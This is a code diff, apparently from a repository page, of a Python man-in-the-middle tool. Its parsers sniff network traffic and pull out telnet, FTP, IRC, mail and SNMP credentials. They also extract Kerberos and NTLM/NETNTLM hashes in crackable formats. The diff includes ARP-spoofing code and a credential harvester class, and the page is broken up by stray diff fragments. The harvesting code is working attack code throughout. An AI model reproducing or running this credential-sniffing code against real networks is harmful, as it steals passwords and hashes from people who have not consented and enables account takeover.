# Create msg, the return variable
|
||||||
|
msg = 'Telnet %s: %s' % (cred_type, value)
|
||||||
|
del self.telnet_stream[src_ip_port]
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
|
||||||
|
# This part relies on the telnet packet ending in
|
||||||
|
# "login:", "password:", or "username:" and being <750 chars
|
||||||
|
# Haven't seen any false+ but this is pretty general
|
||||||
|
# might catch some eventually
|
||||||
|
# maybe use dissector.py telnet lib?
|
||||||
|
if len(self.telnet_stream) > 100:
|
||||||
|
self.telnet_stream.popitem(last=False)
|
||||||
|
mod_load = load.lower().strip()
|
||||||
|
if mod_load.endswith('username:') or mod_load.endswith('login:'):
|
||||||
|
self.telnet_stream[dst_ip_port] = 'username '
|
||||||
|
elif mod_load.endswith('password:'):
|
||||||
|
self.telnet_stream[dst_ip_port] = 'password '
|
||||||
|
|
||||||
|
def ParseMSKerbv5TCP(self, Data):
|
||||||
|
'''
|
||||||
|
Taken from Pcredz because I didn't want to spend the time doing this myself
|
||||||
|
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
|
||||||
|
Maybe replace this eventually with the kerberos python lib
|
||||||
|
Parses Kerberosv5 hashes from packets
|
||||||
|
'''
|
||||||
|
try:
|
||||||
|
MsgType = Data[21:22]
|
||||||
|
EncType = Data[43:44]
|
||||||
|
MessageType = Data[32:33]
|
||||||
|
except IndexError:
|
||||||
|
return
|
||||||
|
|
||||||
|
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
|
||||||
|
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[50:51])[0]
|
||||||
|
if HashLen == 54:
|
||||||
|
Hash = Data[53:105]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[153:154])[0]
|
||||||
|
Name = Data[154:154+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
|
||||||
|
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[47:48])[0]
|
||||||
|
Hash = Data[48:48+HashLen]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
|
||||||
|
Name = Data[HashLen+97:HashLen+97+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
|
||||||
|
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
else:
|
||||||
|
Hash = Data[48:100]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[148:149])[0]
|
||||||
|
Name = Data[149:149+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
|
||||||
|
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
def ParseMSKerbv5UDP(self, Data):
    '''
    Taken from Pcredz because I didn't want to spend the time doing this myself
    I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
    Maybe replace this eventually with the kerberos python lib
    Parses Kerberosv5 hashes from packets

    Data is the raw UDP payload (Py2 byte-string). On a match, returns a
    printable '$krb5pa$23$...' (etype 23 / RC4 pre-auth) crackable string;
    otherwise returns None implicitly.
    '''
    try:
        # Fixed offsets into the ASN.1 DER of an AS-REQ carried over UDP:
        # msg-type and the pre-auth encryption type.
        # NOTE(review): slicing a str never raises IndexError, so this
        # except likely only guards a different Data type -- confirm.
        MsgType = Data[17:18]
        EncType = Data[39:40]
    except IndexError:
        return

    # \x0a = AS-REQ (10), \x17 = etype 23 (RC4-HMAC)
    if MsgType == "\x0a" and EncType == "\x17":
        # \xa2\x36\x04\x34 / \xa2\x35\x04\x33: context tag + OCTET STRING
        # length bytes preceding the PA-ENC-TIMESTAMP cipher blob
        if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
            HashLen = struct.unpack('<b',Data[41:42])[0]
            if HashLen == 54:
                # 52-byte cipher: checksum (16) + encrypted timestamp (36)
                Hash = Data[44:96]
                # Hash is stored checksum-first; crackers expect data+checksum
                SwitchHash = Hash[16:]+Hash[0:16]
                # Principal name and realm follow at fixed offsets
                NameLen = struct.unpack('<b',Data[144:145])[0]
                Name = Data[145:145+NameLen]
                DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
                Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
                BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
                return 'MS Kerberos: %s' % BuildHash

            if HashLen == 53:
                # Same layout, one byte shorter -- all offsets shift by one
                Hash = Data[44:95]
                SwitchHash = Hash[16:]+Hash[0:16]
                NameLen = struct.unpack('<b',Data[143:144])[0]
                Name = Data[144:144+NameLen]
                DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
                Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
                BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
                return 'MS Kerberos: %s' % BuildHash

        else:
            # Variable-length cipher: read its length from the DER length byte
            HashLen = struct.unpack('<b',Data[48:49])[0]
            Hash = Data[49:49+HashLen]
            SwitchHash = Hash[16:]+Hash[0:16]
            # Name/realm offsets are relative to the cipher length here
            NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
            Name = Data[HashLen+98:HashLen+98+NameLen]
            DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
            Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
            BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
            return 'MS Kerberos: %s' % BuildHash
|
||||||
|
|
||||||
|
def Decode_Ip_Packet(self, s):
    '''
    Taken from PCredz, solely to get Kerb parsing
    working until I have time to analyze Kerb pkts
    and figure out a simpler way
    Maybe use kerberos python lib

    Reads the IHL field (low nibble of the first header byte, in 32-bit
    words) of a raw IP header and returns it with the header-stripped payload.
    '''
    ihl_words = ord(s[0]) & 0x0f
    payload = s[4 * ihl_words:]
    return {'header_len': ihl_words, 'data': payload}
|
||||||
|
|
||||||
|
def double_line_checker(self, full_load, count_str):
    '''
    Check if count_str shows up twice in the payload; if it does, return
    only the last complete CRLF-terminated line, otherwise return the
    payload unchanged. Handles packets that double up auth lines, e.g.
    "USER dan\r\nUSER dan\r\n".
    '''
    # BUG FIX: only the payload was lowercased before counting, so an
    # uppercase needle like 'USER' (as passed by parse_ftp) could never
    # match and duplicated lines slipped through. Lowercase both sides.
    num = full_load.lower().count(count_str.lower())
    if num > 1:
        lines = full_load.count('\r\n')
        if lines > 1:
            # split('\r\n')[-1] is '' after a trailing CRLF, so -2 is the
            # last real line
            full_load = full_load.split('\r\n')[-2]
    return full_load
|
||||||
|
|
||||||
|
def parse_ftp(self, full_load, dst_ip_port):
    '''
    Parse out FTP creds (USER/PASS lines) from a client payload.

    Returns a list of printable message strings; empty when the payload
    holds no FTP auth data. Adds a warning when the destination port is
    not 21, since FTP and POP use identical client->server auth packets.
    '''
    print_strs = []

    # Sometimes FTP packets double up on the authentication lines
    # We just want the latest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
    full_load = self.double_line_checker(full_load, 'USER')

    # FTP and POP potentially use identical client > server auth pkts
    ftp_user = re.match(self.ftp_user_re, full_load)
    ftp_pass = re.match(self.ftp_pw_re, full_load)

    if ftp_user:
        print_strs.append('FTP User: %s' % ftp_user.group(1).strip())
    elif ftp_pass:
        print_strs.append('FTP Pass: %s' % ftp_pass.group(1).strip())

    # This warning was duplicated verbatim in both branches above; hoisted
    # here so it runs once whenever either credential matched.
    if print_strs and dst_ip_port[-3:] != ':21':
        print_strs.append('Nonstandard FTP port, confirm the service that is running on it')

    return print_strs
|
||||||
|
|
||||||
|
def mail_decode(self, src_ip_port, dst_ip_port, mail_creds):
    '''
    Decode base64 mail (SASL PLAIN) creds and print them.

    PLAIN auth separates authzid/user/password with NUL bytes; they are
    swapped for spaces so the result is printable. Silently does nothing
    when the data is not valid base64 or not valid UTF-8 text.
    '''
    try:
        # NULs are replaced before decoding; the original code repeated the
        # same .replace() on the decoded text, which was a no-op.
        decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
    except TypeError:
        # not valid base64
        decoded = None
    except UnicodeDecodeError:
        # valid base64, but not utf8 text
        decoded = None

    if decoded is not None:
        msg = 'Decoded: %s' % decoded
        self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
|
||||||
|
def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq):
    '''
    Catch IMAP, POP, and SMTP logins

    Stateful, multi-packet parser. self.mail_auths maps an "ip:port"
    endpoint to a list of TCP acks seen for that auth exchange, so a
    client's follow-up packet (carrying the actual creds) and the
    server's pass/fail response can be tied back to the initial AUTH
    command. Returns True when something was found, else None.
    '''
    # Handle the first packet of mail authentication
    # if the creds aren't in the first packet, save it in mail_auths

    # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]

    found = False

    # Sometimes mail packets double up on the authentication lines
    # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
    full_load = self.double_line_checker(full_load, 'auth')

    # Client to server 2nd+ pkt: this endpoint already sent an AUTH cmd,
    # so this payload should be the base64 credentials themselves
    if src_ip_port in self.mail_auths:
        # NOTE(review): [-1] is the last stored ack (an int); membership
        # test against an int raises TypeError -- this looks like it was
        # meant to be `seq == self.mail_auths[src_ip_port][-1]`. Confirm
        # against upstream net-creds before changing.
        if seq in self.mail_auths[src_ip_port][-1]:
            stripped = full_load.strip('\r\n')
            try:
                decoded = base64.b64decode(stripped)
                msg = 'Mail authentication: %s' % decoded
                self.printer(src_ip_port, dst_ip_port, msg)
            except TypeError:
                # payload wasn't base64; ignore
                pass
            self.mail_auths[src_ip_port].append(ack)

    # Server responses to client
    # seq always = last ack of tcp stream
    elif dst_ip_port in self.mail_auths:
        # NOTE(review): same int-membership concern as above
        if seq in self.mail_auths[dst_ip_port][-1]:
            # Look for any kind of auth failure or success
            a_s = 'Authentication successful'
            a_f = 'Authentication failed'
            # SMTP auth was successful (235 = auth succeeded)
            if full_load.startswith('235') and 'auth' in full_load.lower():
                # Reversed the dst and src (report from the server's side)
                self.printer(dst_ip_port, src_ip_port, a_s)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass
            # SMTP failed (535 = auth credentials invalid)
            elif full_load.startswith('535 '):
                # Reversed the dst and src
                self.printer(dst_ip_port, src_ip_port, a_f)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass
            # IMAP/POP/SMTP failed
            elif ' fail' in full_load.lower():
                # Reversed the dst and src
                self.printer(dst_ip_port, src_ip_port, a_f)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass
            # IMAP auth success
            elif ' OK [' in full_load:
                # Reversed the dst and src
                self.printer(dst_ip_port, src_ip_port, a_s)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass

            # Pkt was not an auth pass/fail so its just a normal server ack
            # that it got the client's first auth pkt
            else:
                # Cap the tracking dict so it can't grow unbounded
                if len(self.mail_auths) > 100:
                    self.mail_auths.popitem(last=False)
                self.mail_auths[dst_ip_port].append(ack)

    # Client to server but it's a new TCP seq
    # This handles most POP/IMAP/SMTP logins but there's at least one edge case
    else:
        mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE)
        if mail_auth_search != None:
            auth_msg = full_load
            # IMAP uses the number at the beginning
            if mail_auth_search.group(1) != None:
                auth_msg = auth_msg.split()[1:]
            else:
                auth_msg = auth_msg.split()
            # Check if its a pkt like AUTH PLAIN dvcmQxIQ==
            # rather than just an AUTH PLAIN
            if len(auth_msg) > 2:
                mail_creds = ' '.join(auth_msg[2:])
                msg = 'Mail authentication: %s' % mail_creds
                self.printer(src_ip_port, dst_ip_port, msg)

                self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
                try:
                    del self.mail_auths[src_ip_port]
                except KeyError:
                    pass
                found = True

            # Mail auth regex was found and src_ip_port is not in mail_auths
            # Pkt was just the initial auth cmd, next pkt from client will hold creds
            if len(self.mail_auths) > 100:
                self.mail_auths.popitem(last=False)
            self.mail_auths[src_ip_port] = [ack]

        # At least 1 mail login style doesn't fit in the original regex:
        # 1 login "username" "password"
        # This also catches FTP authentication!
        # 230 Login successful.
        elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None:

            # FTP authentication failures trigger this
            #if full_load.lower().startswith('530 login'):
            #    return

            auth_msg = full_load
            auth_msg = auth_msg.split()
            # Expect exactly "<tag> login <user> <pass>"-shaped payloads
            if 2 < len(auth_msg) < 5:
                mail_creds = ' '.join(auth_msg[2:])
                msg = 'Authentication: %s' % mail_creds
                self.printer(src_ip_port, dst_ip_port, msg)
                self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
                found = True

    if found == True:
        return True
|
||||||
|
|
||||||
|
def irc_logins(self, full_load):
    '''
    Find IRC logins (NICK and NickServ IDENTIFY lines).

    Returns a printable message string, or None when the payload holds
    no IRC auth data.
    '''
    user_search = re.match(self.irc_user_re, full_load)
    pass_search = re.match(self.irc_pw_re, full_load)
    if user_search:
        return 'IRC nick: %s' % user_search.group(1)
    if pass_search:
        # BUG FIX: this branch called self.printer(src_ip_port, dst_ip_port,
        # msg) with names that do not exist in this scope, so any password
        # match raised NameError. Return the formatted message like the
        # nick branch and let the caller print it.
        return 'IRC pass: %s' % pass_search.group(1)
|
||||||
|
|
||||||
|
def headers_to_dict(self, header_lines):
    '''
    Convert "Name: value" header lines into a dict keyed by the
    lowercased header name.
    '''
    # Flatten every line split at ': ' into one stream, then pair
    # consecutive items back up as (name, value); an unmatched trailing
    # item (a line with no ': ') is dropped by zip.
    flat = []
    for line in header_lines:
        flat.extend(line.split(': ', 1))
    pairs = zip(flat[0::2], flat[1::2])
    return dict((name.lower(), value) for name, value in pairs)
|
||||||
|
|
||||||
|
def parse_http_load(self, full_load, http_methods):
    '''
    Split the raw load into (request line, header lines, body).

    Payloads with no recognizable HTTP request line are treated as all
    body so they can still be scanned for usernames and passwords.
    '''
    if "\r\n\r\n" in full_load:
        headers, body = full_load.split("\r\n\r\n", 1)
    else:
        headers, body = full_load, ''
    header_lines = headers.split("\r\n")

    # Pkts may just contain hex data and no headers; still parse them
    http_line = self.get_http_line(header_lines, http_methods)
    if not http_line:
        headers = ''
        body = full_load

    remaining = [ln for ln in header_lines if ln != http_line]

    return http_line, remaining, body
|
||||||
|
|
||||||
|
def get_http_line(self, header_lines, http_methods):
    '''
    Return the first header line that begins with an HTTP method,
    or None when no line does.
    '''
    # str.startswith accepts a tuple, so all methods are tested per line
    # in a single call
    method_prefixes = tuple(http_methods)
    for candidate in header_lines:
        if candidate.startswith(method_prefixes):
            return candidate
|
||||||
|
|
||||||
|
|
||||||
|
def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
    '''
    Catch-all parser for a TCP payload: Kerberos over TCP, raw NTLMSSP
    blobs (SMB/LDAP/MSSQL/DCE-RPC), and NETNTLM over HTTP auth headers.
    Prints anything it finds via self.printer.
    '''

    #For now we will parse the HTTP headers through scapy and not through Twisted
    #This will have to get changed in the future, seems a bit redundent
    http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
    http_line, header_lines, body = self.parse_http_load(full_load, http_methods)
    headers = self.headers_to_dict(header_lines)

    # Kerberos over TCP: strip the 14-byte Ethernet header, then the
    # 20-byte IP header, before handing the TCP payload to the parser
    decoded = self.Decode_Ip_Packet(str(pkt)[14:])
    kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:])
    if kerb_hash:
        self.printer(src_ip_port, dst_ip_port, kerb_hash)

    # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
    # Type-2 (server challenge) and type-3 (client response) messages
    NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL)
    NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL)
    if NTLMSSP2:
        # Stash the challenge keyed by ack so the response can find it
        self.parse_ntlm_chal(NTLMSSP2.group(), ack)
    if NTLMSSP3:
        ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq)
        if ntlm_resp_found != None:
            self.printer(src_ip_port, dst_ip_port, ntlm_resp_found)

    # Look for authentication headers
    # (the guard below only pre-seeds the vars when the loop won't run)
    if len(headers) == 0:
        authenticate_header = None
        authorization_header = None
    for header in headers:
        authenticate_header = re.match(self.authenticate_re, header)
        authorization_header = re.match(self.authorization_re, header)
        if authenticate_header or authorization_header:
            break

    if authorization_header or authenticate_header:
        # NETNTLM over HTTP (WWW-Authenticate / Authorization)
        netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
        if netntlm_found != None:
            self.printer(src_ip_port, dst_ip_port, netntlm_found)
|
||||||
|
|
||||||
|
def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq):
    '''
    Route WWW-Authenticate / Authorization header matches to the right
    NTLM parser. Returns a printable hash string for type-3 client
    responses, otherwise None.
    '''
    # Type 2 challenge from server
    if authenticate_header is not None:
        self.parse_netntlm_chal(headers, authenticate_header.group(), ack)
        return

    # Type 3 response from client
    if authorization_header is not None:
        return self.parse_netntlm_resp_msg(headers, authorization_header.group(), seq)
|
||||||
|
|
||||||
|
def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer):
    '''
    Parse out the SNMP version and community string from a scapy SNMP
    layer and print them. Returns True when a community string was found.
    '''
    # isinstance instead of type(...) == str: idiomatic and also accepts
    # str subclasses (scapy field values)
    if isinstance(snmp_layer.community.val, str):
        ver = snmp_layer.version.val
        msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
        self.printer(src_ip_port, dst_ip_port, msg)
        return True
|
||||||
|
|
||||||
|
def parse_netntlm_chal(self, headers, chal_header, ack):
    '''
    Parse the netntlm server challenge out of a WWW-Authenticate header.
    https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
    '''
    header_val2 = headers[chal_header]
    header_val2 = header_val2.split(' ', 1)
    # The header value can either start with NTLM or Negotiate
    if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
        msg2 = header_val2[1]
        msg2 = base64.decodestring(msg2)
        # BUG FIX: the arguments were passed as (ack, msg2), but the callee
        # signature is parse_ntlm_chal(self, msg2, ack) -- the swap made it
        # try to slice the integer ack and the challenge was never stored.
        # other_parser already calls it in the correct (msg2, ack) order.
        self.parse_ntlm_chal(msg2, ack)
|
||||||
|
|
||||||
|
def parse_ntlm_chal(self, msg2, ack):
    '''
    Parse server challenge

    msg2 is the raw decoded NTLMSSP type-2 message (Py2 byte-string).
    Stores the 8-byte server challenge (hex-encoded) in
    self.challenge_acks keyed by the TCP ack, so the later type-3
    response (whose seq equals this ack) can be paired with it.
    '''

    # First 8 bytes are the "NTLMSSP\0" signature (read but unused here)
    Signature = msg2[0:8]
    # Bytes 8-12: little-endian message type; 2 = server challenge
    msg_type = struct.unpack("<I",msg2[8:12])[0]
    # NOTE(review): assert is stripped under python -O; a malformed blob
    # would then fall through silently
    assert(msg_type==2)
    # Bytes 24-32 hold the 8-byte challenge
    ServerChallenge = msg2[24:32].encode('hex')

    # Keep the dict of ack:challenge to less than 50 chals
    if len(self.challenge_acks) > 50:
        self.challenge_acks.popitem(last=False)
    self.challenge_acks[ack] = ServerChallenge
|
||||||
|
|
||||||
|
def parse_netntlm_resp_msg(self, headers, resp_header, seq):
    '''
    Decode the client's Authorization header value and hand the raw
    NTLM type-3 message to parse_ntlm_resp. Returns its result, or
    None when the header does not carry an NTLM/Negotiate blob.
    '''
    scheme_and_data = headers[resp_header].split(' ', 1)

    # The header value can either start with NTLM or Negotiate
    if scheme_and_data[0] in ('NTLM', 'Negotiate'):
        msg3 = base64.decodestring(scheme_and_data[1])
        return self.parse_ntlm_resp(msg3, seq)
|
||||||
|
|
||||||
|
def parse_ntlm_resp(self, msg3, seq):
    '''
    Parse the 3rd msg in NTLM handshake
    Thanks to psychomario

    msg3 is the raw NTLMSSP type-3 message (Py2 byte-string); seq is the
    TCP seq, which matches the ack the challenge was stored under in
    parse_ntlm_chal. Returns a crackable NETNTLMv1/v2 string or None.
    '''

    # Pair this response with the server challenge captured earlier
    if seq in self.challenge_acks:
        challenge = self.challenge_acks[seq]
    else:
        challenge = 'CHALLENGE NOT FOUND'

    # 44 bytes = fixed header + the six (len, maxlen, offset) field
    # descriptors unpacked below
    if len(msg3) > 43:
        # Thx to psychomario for below
        lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
        lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
        nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
        # Domain/user are UTF-16LE; stripping NULs crudely converts to ASCII
        domain = msg3[domoff:domoff+domlen].replace("\0", "")
        user = msg3[useroff:useroff+userlen].replace("\0", "")
        # Original check by psychomario, might be incorrect?
        #if lmhash != "0"*48: #NTLMv1
        if ntlen == 24: #NTLMv1
            msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
            return msg
        elif ntlen > 60: #NTLMv2
            # v2 format splits the NT response: first 16 bytes (32 hex
            # chars) are the NTProofStr, the rest is the blob
            msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
            return msg
|
||||||
|
|
||||||
|
def printer(self, src_ip_port, dst_ip_port, msg):
    '''
    Log a capture. All credentials carry a dst_ip_port; URL-only hits
    do not, and are logged with just the source host.
    '''
    if dst_ip_port is None:
        # URL hit: source host only, no color codes
        line = '[%s] %s' % (src_ip_port.split(':')[0], msg)
    else:
        # Credential hit: wrap msg in the module color codes T/W
        line = '[%s --> %s] %s%s%s' % (src_ip_port, dst_ip_port, T, msg, W)
    logging.info(line)
|
134
plugins/Spoof.py
134
plugins/Spoof.py
|
@ -361,137 +361,3 @@ class Spoof(Plugin):
|
||||||
print '[*] Re-arping network'
|
print '[*] Re-arping network'
|
||||||
pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
|
pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
|
||||||
sendp(pkt, inter=1, count=5, iface=self.interface)
|
sendp(pkt, inter=1, count=5, iface=self.interface)
|
||||||
|
|
||||||
class CredHarvester():
    """
    Passive credential sniffer for IRC, IMAP, POP3, SMTP and FTP.

    start() runs a blocking scapy sniff loop; each packet is routed by
    destination/source port to a protocol parser, with per-ack fragment
    reassembly in prev_pkt. Found creds are emitted via logging.
    """

    # Per-protocol parser state; immutable defaults are safe as class attrs
    fragged = 0
    imapauth = 0
    popauth = 0
    ftpuser = None  # Necessary since user and pass come in separate packets
    ircnick = None  # Necessary since user and pass come in separate packets

    def __init__(self):
        # For concatenating fragmented packets, keyed by port then TCP ack.
        # BUG FIX: this dict used to be a class attribute, so every
        # CredHarvester instance shared (and cross-contaminated) the same
        # reassembly buffers. Created per-instance instead.
        self.prev_pkt = {6667: {},  # IRC
                         143: {},   # IMAP
                         110: {},   # POP3
                         26: {},    # SMTP
                         25: {},    # SMTP
                         21: {}}    # FTP

    def start(self, interface):
        """Blocking scapy sniff loop; every packet goes through pkt_sorter."""
        sniff(prn=self.pkt_sorter, iface=interface)

    def pkt_sorter(self, pkt):
        """Stash the packet's fields on self and dispatch by port."""
        if pkt.haslayer(Raw) and pkt.haslayer(TCP):
            self.dest = pkt[IP].dst
            self.src = pkt[IP].src
            self.dport = pkt[TCP].dport
            self.sport = pkt[TCP].sport
            self.ack = pkt[TCP].ack
            self.seq = pkt[TCP].seq
            self.load = str(pkt[Raw].load)

            if self.dport == 6667:
                """ IRC """
                port = 6667
                self.header_lines = self.hb_parse(port)  # Join fragmented pkts
                return self.irc(port)

            elif self.dport == 21 or self.sport == 21:
                """ FTP """
                port = 21
                self.prev_pkt[port] = self.frag_joiner(port)  # No headers in FTP so no need for hb_parse
                self.ftp(port)

            elif self.sport == 110 or self.dport == 110:
                """ POP3 """
                port = 110
                self.header_lines = self.hb_parse(port)  # Join fragmented pkts
                self.mail_pw(port)

            elif self.sport == 143 or self.dport == 143:
                """ IMAP """
                port = 143
                self.header_lines = self.hb_parse(port)  # Join fragmented pkts
                self.mail_pw(port)

    def headers_body(self, protocol):
        """Split a payload into (headers, body) at the first blank line."""
        try:
            h, b = protocol.split("\r\n\r\n", 1)
            return h, b
        except ValueError:
            # No blank line: whole payload is headers, empty body
            return protocol, ''

    def frag_joiner(self, port):
        """Concatenate this payload onto a previous fragment with the same ack."""
        self.fragged = 0
        if len(self.prev_pkt[port]) > 0:
            if self.ack in self.prev_pkt[port]:
                self.fragged = 1
                return {self.ack: self.prev_pkt[port][self.ack] + self.load}
        return {self.ack: self.load}

    def hb_parse(self, port):
        """Reassemble fragments, split headers from body, return header lines."""
        self.prev_pkt[port] = self.frag_joiner(port)
        self.headers, self.body = self.headers_body(self.prev_pkt[port][self.ack])
        return self.headers.split('\r\n')

    def mail_pw(self, port):
        """Watch for IMAP/POP AUTH PLAIN exchanges and log the creds packet."""
        load = self.load.strip('\r\n')

        if self.dport == 143:
            auth_find = 'authenticate plain'
            proto = 'IMAP'
            auth = self.imapauth
            self.imapauth = self.mail_pw_auth(load, auth_find, proto, auth, port)

        elif self.dport == 110:
            auth_find = 'AUTH PLAIN'
            proto = 'POP'
            auth = self.popauth
            self.popauth = self.mail_pw_auth(load, auth_find, proto, auth, port)

    def mail_pw_auth(self, load, auth_find, proto, auth, port):
        """Two-step state machine: 1 after the AUTH cmd, creds in the next pkt."""
        if auth == 1:
            user, pw = load, 0
            logging.warning('[%s] %s auth: %s' % (self.src, proto, load))
            self.b64decode(load, port)
            return 0

        elif auth_find in load:
            return 1

    def b64decode(self, load, port):
        """Best-effort decode of SASL PLAIN base64 creds; logs on success."""
        b64str = load
        try:
            decoded = b64decode(b64str).replace('\x00', ' ')[1:]  # delete space at beginning
        except Exception:
            # Deliberate best-effort: not base64, or not NUL-separated text
            decoded = ''
        # Test to see if decode worked
        if '@' in decoded:
            logging.debug('%s Decoded: %s' % (self.src, decoded))
            decoded = decoded.split()

    def ftp(self, port):
        """Catch FTP usernames, passwords, and servers"""
        load = self.load.replace('\r\n', '')

        if port == self.dport:
            if 'USER ' in load:
                # BUG FIX: load.strip('USER ') is a *character set* strip and
                # mangled any name starting/ending in U/S/E/R or space
                # (e.g. 'SERGE' -> 'G'). Slice after the marker instead.
                user = load.split('USER ', 1)[1]
                # BUG FIX: the old call passed `user` as an extra logging arg
                # to an already-%-formatted string with no placeholder left,
                # which blows up at log time. Use lazy %-args properly.
                logging.warning('[%s > %s] FTP user: %s', self.src, self.dest, user)
                self.ftpuser = user

            elif 'PASS ' in load:
                # Same character-set-strip fix as USER above
                pw = load.split('PASS ', 1)[1]
                logging.warning('[%s > %s] FTP password: %s', self.src, self.dest, pw)

    def irc(self, port):
        """Catch IRC nicks and NickServ IDENTIFY passwords."""
        load = self.load.split('\r\n')[0]

        if 'NICK ' in load:
            # BUG FIX: load.strip('NICK ') stripped characters, not the
            # prefix ('NICK NICKY' -> 'Y'). Slice after the marker instead.
            self.ircnick = load.split('NICK ', 1)[1]
            logging.warning('[%s > %s] IRC nick: %s' % (self.src, self.dest, self.ircnick))

        elif 'NS IDENTIFY ' in load:
            ircpass = load.split('NS IDENTIFY ', 1)[1]
            logging.warning('[%s > %s] IRC password: %s' % (self.src, self.dest, ircpass))
|
|
Loading…
Add table
Add a link
Reference in a new issue